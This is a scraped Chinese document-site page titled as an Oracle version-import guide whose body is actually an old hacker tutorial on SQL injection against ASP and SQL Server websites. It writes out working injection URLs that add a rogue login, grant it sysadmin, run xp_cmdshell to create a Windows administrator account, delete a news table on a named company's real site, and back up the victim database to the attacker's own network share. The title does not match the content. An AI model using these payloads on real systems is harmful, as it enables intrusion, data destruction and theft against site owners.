- 1、本文档共8页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
oracle数据库从低版本导入高版本方法
数据库链应用实例:将一台机器的Oracle7数据库中的数据导入到另一台机器的Oracle9i中去? HYPERLINK / / 2010-05-21 11:55来源: HYPERLINK http://www.q.cc/2004/12/25/13171.html 电子商务 HYPERLINK /redirect.dy 发表评论?(0)????SQL数据库的一些攻击具体内容: 对于国内外的很多新闻,BBS和电子商务网站都采用ASP+SQL设计,而写ASP的程序员很多(有很多刚刚毕业的),所以,ASP+SQL的攻击成功率也比较高。这类攻击方法与NT的版本和SQL的版本没有多大的关系,也没有相应的补丁,因为漏洞是程序员自己造成的,而且大多数讲解ASP编程的书上,源代码例子就有这个漏洞存在,其实只是一些合法的ASP对SQL的请求,就留下后患无穷!这种攻击方法最早源于or1=1的漏洞(我们暂且称其为漏洞),这个漏洞的原理我想大家因都知道了,那么随之而来的便是;execsp_addlogin hax(在数据库内添加一个hax用户),但是这个方法的限制很大,首先ASP使用的SQLServer账号是个管理员,其次请求的提交变量在整个SQL语句的最后,因为有一些程序员采用SELECT * FROM news WHERE id=... AND topic=...AND .....这种方法请求数据库,那么如果还用以上的例子就会news.asp?id=2;exec sp_addlogin hax变成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=...AND ...整个SQL语句在执行sp_addlogin的存储过程后有AND与判断存在,语法错误,你的sp_addlogin自然也不能正常运行了,因此试试看下面这个方法news.asp?id=2;exec sp_addlogin hax;--后面的--符号把sp_addlogin后的判断语句变成了注释,这样就不会有语法错误了,sp_addlogin正常执行!那么我们连一起来用吧news.asp?id=2;exec master.dbo.sp_addlogin hax;--news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--news.asp?id=2;exec master.dbo.xp_cmdshell net user hax hax/workstations:* /times:all /passwordchg:yes /passwordreq:yes/active:yes /add;--news.asp?id=2;exec master.dbo.xp_cmdshell net localgroupadministrators hax /add;--这样,你在他的数据库和系统内都留下了hax管理员账号了当然,前提条件是ASP用管理员账号,所以虚拟空间大家就别试了,不会存在这个漏洞的。以后我们会讨论,如果对方的ASP不是用SQL管理员账号,我们如何入侵,当然也会涉及到1433端口的入侵当然大家可以试试看在id=2后面加上一个符号,主要看对方的ASP怎么写了再说说当ASP程序使用的SQL账号不是管理员的时候我们如何做。你如天融信的主页,有新闻内容,如下:/news/news-2.asp?newid=117大家可以试试看/news/news-2.asp?newid=117;select123;--呵呵,报语法错误,select 123错误,显而易见,天融新的ASP在newid变量后面用号结束那么试试看/news/news-2.asp?newid=117;deletenews;--哈哈,我想只要表名猜对了,新闻库就被删了通常ASP用的SQL账号就算不是管理员也会是某个数据库的owner,至少对于这个库有很高的管理权限但是我们不知道库名怎么?看看db_name函数吧打开你的query analyzer,看看print db_name ,呵呵,当前的数据库名就出来了以次类推,如下: declare @a sysname;set @a=db_name;backup database @a todisk=你的IP你的共享目录bak.dat ,name=test;--呵呵,他的当前数据库就备份到你的硬盘上了,接下来要做的大家心里都明白了吧同理这个方法可以找到对
您可能关注的文档
- 北语15春《人际交往与沟通艺术》作业2.doc
- 4-2010年中小学体育教师招聘考试题目与答案E.doc
- 南大第一次作业微观经济学.docx
- 即使一分钱也会捡起来_李嘉诚坦言致富.doc
- 4-内部控制和审计.ppt
- 4.18 运放基本放大应用——电子科技大学——电子实验中心——.ppt
- 4.2.2人才培养方案制定标准、过程、目标.doc
- 基于matlab来确定一轻型五档货车的动力性.docx
- 基础会计知识读本01.ppt
- 4.4.1-1 EHS管理岗位职责和权限.doc
- 2-红河州建筑施工安全生产标准化工地复核评分表(2022年修改版).docx
- 6.锡通项目2018年下半年工作会汇报材料(2018.7.9).docx
- 2018道路工程知识点汇总(新版).docx
- 附件3:月度生产例会安全汇报资料-站台门项目部.docx
- 附件2:广东建工集团2018年度科技成果汇总表.DOC
- 马武停车区、三汇停车区停车位管理系统,0#台账缺量.doc
- 攀成钢委办发〔2015〕19号(党风廉政建设责任考核与追究办法).doc
- 1-红河州建筑工程质量管理标准化复核评分表(2022年修改版).docx
- 中交第三公路工程局第四工程分公司项目经济合同结算管理办法(修订).doc
- 厂站安全操作规程汇编.doc
文档评论(0)